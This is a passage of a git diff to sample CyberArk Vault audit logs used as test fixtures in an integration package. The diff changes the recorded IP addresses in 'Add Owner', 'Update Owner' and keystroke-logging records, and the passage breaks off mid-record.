Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} +<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/33_update_owner.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/33_update_owner.log index 16ec40c4f3c..99bf81c1f96 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/33_update_owner.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/33_update_owner.log @@ -1,7 +1,7 @@ -<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-11T17:38:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-11T17:38:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 67.43.156.13\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/361_keystroke_logging.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/361_keystroke_logging.log index 6c959f21d65..c6311470971 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/361_keystroke_logging.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/361_keystroke_logging.log @@ -1,7 +1,7 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"361","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke 